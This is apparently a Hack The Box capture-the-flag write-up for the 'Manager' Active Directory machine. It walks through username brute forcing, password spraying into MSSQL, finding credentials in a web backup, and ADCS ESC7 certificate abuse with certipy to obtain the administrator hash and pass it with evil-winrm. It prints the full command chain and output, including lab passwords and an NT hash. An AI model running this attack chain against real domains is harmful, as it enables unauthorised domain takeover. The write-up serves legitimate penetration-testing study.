Manager was a medium AD box with no web server. The box starts with brute forcing Kerberos usernames leading to MSSQL access. With the MSSQL access, it will get you the backup file with creds which can be used to log in via evil-winrm. The escalation is done using ESC7 ADCS vulnerability.

Enumeration

Nmap showed 12 ports

53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-03-07 18:57:21Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)

Port 80 was static with no functionalities to interact with and useless directory bruting results.

htb manager homepage|hackthebox manager homepage

Being an AD box, I enumerated using SMB, LDAP, RPC and impacket scripts, unfortunately, those were unsuccessful without any username and password.

Bruteforcing

Bruteforcing can be done in two ways, RID bruteforcing and username bruteforcing. Cracmapexec and kerbrute are tools that can be utilized for bruteforcing. Crackmapexec is not longer maintained, its latest alternative is netexec.

Relative identifier (RID) is a variable length number that is assigned to objects at creation and becomes part of the object’s Security Identifier (SID) that uniquely identifies an account or group within a domain.

RID Bruteforcing using crackmapexec

$ crackmapexec smb 10.10.11.236 -u anonymous -p "" --rid-brute 10000

RID Bruteforcing using netexec

$ netexec smb 10.10.11.236 -u anonymous -p "" --rid-brute 10000

Note: The username parameter can be any random value, a username that doesn’t exist will work here. The number 10000 is the maximum number of RIDs to bruteforce

Crackmapexec Results

498: MANAGER\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: MANAGER\Administrator (SidTypeUser)
501: MANAGER\Guest (SidTypeUser)
502: MANAGER\krbtgt (SidTypeUser)
512: MANAGER\Domain Admins (SidTypeGroup)
513: MANAGER\Domain Users (SidTypeGroup)
514: MANAGER\Domain Guests (SidTypeGroup)
515: MANAGER\Domain Computers (SidTypeGroup)
516: MANAGER\Domain Controllers (SidTypeGroup)
517: MANAGER\Cert Publishers (SidTypeAlias)
518: MANAGER\Schema Admins (SidTypeGroup)
519: MANAGER\Enterprise Admins (SidTypeGroup)
520: MANAGER\Group Policy Creator Owners (SidTypeGroup)
521: MANAGER\Read-only Domain Controllers (SidTypeGroup)
522: MANAGER\Cloneable Domain Controllers (SidTypeGroup)
525: MANAGER\Protected Users (SidTypeGroup)
526: MANAGER\Key Admins (SidTypeGroup)
527: MANAGER\Enterprise Key Admins (SidTypeGroup)
553: MANAGER\RAS and IAS Servers (SidTypeAlias)
571: MANAGER\Allowed RODC Password Replication Group (SidTypeAlias)
572: MANAGER\Denied RODC Password Replication Group (SidTypeAlias)
1000: MANAGER\DC01$ (SidTypeUser)
1101: MANAGER\DnsAdmins (SidTypeAlias)
1102: MANAGER\DnsUpdateProxy (SidTypeGroup)
1103: MANAGER\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
1113: MANAGER\Zhong (SidTypeUser)
1114: MANAGER\Cheng (SidTypeUser)
1115: MANAGER\Ryan (SidTypeUser)
1116: MANAGER\Raven (SidTypeUser)
1117: MANAGER\JinWoo (SidTypeUser)
1118: MANAGER\ChinHae (SidTypeUser)
1119: MANAGER\Operator (SidTypeUser)

Username Bruteforcing using kerbrute

$ kerbrute userenum -d manager.htb /usr/share/wordlist/xato-net-10-million-usernames.txt --dc dc01.manager.htb

Results

[+] VALID USERNAME:       ryan@manager.htb
[+] VALID USERNAME:       guest@manager.htb
[+] VALID USERNAME:       cheng@manager.htb
[+] VALID USERNAME:       raven@manager.htb
[+] VALID USERNAME:       administrator@manager.htb
[+] VALID USERNAME:       Ryan@manager.htb
[+] VALID USERNAME:       Raven@manager.htb
[+] VALID USERNAME:       operator@manager.htb

Since kerbrute is executed with a 10-million list, it took around 10 minutes to complete and crackmapexec was completed within 2 minutes. It is advised to use multiple tools for performing the same thing against an AD environment.

Accessing MSSQL

Use the results from crackmapexec to authenticate the MSSQL service. If you don’t have the passwords, use the same list for the username and password. The below command identified operator as a valid user with operator as a password.

MSSQL Username Enumeration

$ crackmapexec mssql 10.10.11.236 -u users.txt -p users.txt --no-bruteforce

Accessing MSSQL

Use the same creds, with impacket’s mssqlclient.py to access the MSSQL service. I couldn’t identify any valid information from the databases, or even crack the ntlmv2 hash. Enumerating the wwwroot using xp_dirtree gave a backupfile.

$ mssqlclient.py manager.htb/operator:operator@dc01.manager.htb -windows-auth
SQL (MANAGER\Operator  guest@master)> EXEC xp_dirtree "C:\inetpub\wwwroot", 1,1
subdirectory                      depth   file   
-------------------------------   -----   ----   
about.html                            1      1   

contact.html                          1      1   

css                                   1      0   

images                                1      0   

index.html                            1      1   

js                                    1      0   

service.html                          1      1   

web.config                            1      1   

website-backup-27-07-23-old.zip       1      1

xp_dirtree is an extended stored procedure in SQL Server that is used to retrieve a hierarchical listing of folders and files in a specified directory. Syntax : xp_dirtree 'directory_path', [,'depth']

Exploiting

Shell as Raven

Download the backup file from http://manager.htb/website-backup-27-07-23-old.zip and unzip. The credentials for user raven were in a hidden XML.

<access-user>
         <user>raven@manager.htb</user>
         <password>R4v3nBe5tD3veloP3r!123</password>
</access-user>

I grabbed a shell with evil-winrm to get the user.txt

$ evil-winrm -u raven -i manager.htb -p 'R4v3nBe5tD3veloP3r!123'

Privilege Escalation

With a valid user and password, I tried impacket scripts to find any (ASREP/Kerbe)Roastable accounts, which was unsuccessful. Valid creds give you more possibilities to enumerate, and there I tried enumerating the certificates of the domain.

$ certipy find -u raven -p 'R4v3nBe5tD3veloP3r!123' -target manager.htb -text -stdout -vulnerable

This enumeration can also be done from the vulnerable machine with certify.exe. Ceritpy couldn’t identify a vulnerable certificate, however, it found an ESC7 vulnerability.

[snip]
...
..
.                            
Access Rights
    Enroll                          : MANAGER.HTB\Operator
                                      MANAGER.HTB\Authenticated Users
                                      MANAGER.HTB\Raven
    ManageCertificates              : MANAGER.HTB\Administrators
                                      MANAGER.HTB\Domain Admins
                                      MANAGER.HTB\Enterprise Admins
    ManageCa                        : MANAGER.HTB\Administrators
                                      MANAGER.HTB\Domain Admins
                                      MANAGER.HTB\Enterprise Admins
                                      MANAGER.HTB\Raven
[!] Vulnerabilities
ESC7                    : 'MANAGER.HTB\\Raven' has dangerous permissions
Certificate Templates   : [!] Could not find any certificate templates

ESC7 vulnerability is technically explained in certipy GitHub repo.

The user must also have the Manage Certificates access right, and the certificate template SubCA must be enabled. The Manage CA access right can fulfil these prerequisites.

The technique relies on the fact that users with the Manage CA and Manage Certificates access rights can issue failed certificate requests. The SubCA certificate template is vulnerable to ESC1, but only administrators can enrol in the template. Thus, a user can request to enrol in the SubCA - which will be denied - but then issued by the manager afterwards.
~ Certipy GitHub

Fetching certificates

Multiple steps were involved in escalating to Administrator user.

  1. Grant raven the Manage Certificates access right by adding your user as a new officer.
$ certipy ca -ca 'manager-DC01-CA' -add-officer raven -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
Certipy v4.8.0 - by Oliver Lyak (ly4k)                                                                         
                                                                                                               
[*] Successfully added officer 'Raven' on 'manager-DC01-CA'
Certipy v4.8.0 - by Oliver Lyak (ly4k)
  1. Request a certificate based on the SubCA template. This request will be denied, but save the private key and note down the request ID.
$ certipy req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target manager.htb -template SubCA -upn administrator@manager.htb
Certipy v4.8.0 - by Oliver Lyak (ly4k)                 
                                                       
[*] Requesting certificate via RPC                     
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enrol for this type of certificate.           
[*] Request ID is 13                                   
Would you like to save the private key? (y/N) y                                                                
[*] Saved private key to 13.key                        
[-] Failed to request certificate
  1. Issue the failed certificate request with the ca command and the -issue-request <request ID> parameter.
$ certipy ca -ca "manager-DC01-CA" -issue-request 13 -username 'raven@manager.htb' -password 'R4v3nBe5tD3veloP3r!123'
Certipy v4.8.0 - by Oliver Lyak (ly4k)                 
                                                                                                               
[*] Successfully issued certificate
  1. Retrieve the issued certificate with the req command and the -retrieve <request ID> parameter.
$ certipy req -username 'raven@manager.htb' -password 'R4v3nBe5tD3veloP3r!123' -ca "manager-DC01-CA" -target manager.htb -retrieve 13
Certipy v4.8.0 - by Oliver Lyak (ly4k)                 
                                                                                                               
[*] Rerieving certificate with ID 13                   
[*] Successfully retrieved certificate                                                                         
[*] Got certificate with UPN 'administrator@manager.htb'                                                       
[*] Certificate has no object SID                                                                              
[*] Loaded private key from '13.key'                                                                           
[*] Saved certificate and private key to 'administrator.pfx'

Shell as Administrator

  1. Fetch Admin Hash.
$ sudo ntpdate -u manager.htb #Resolve clock skew
$ certipy auth -pfx administrator.pfx -dc-ip 10.10.11.236 
Certipy v4.8.0 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef

Note: certipy triggered Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great) while authenticating using certipy, it was because of the local time of the attacking machine. Time was synchronised with the DC using ntpdate.

  1. Login as Administrator.
$ evil-winrm -u administrator -i manager.htb -H ae5064c2f62317332c88629e025924ef #Shell as Administrator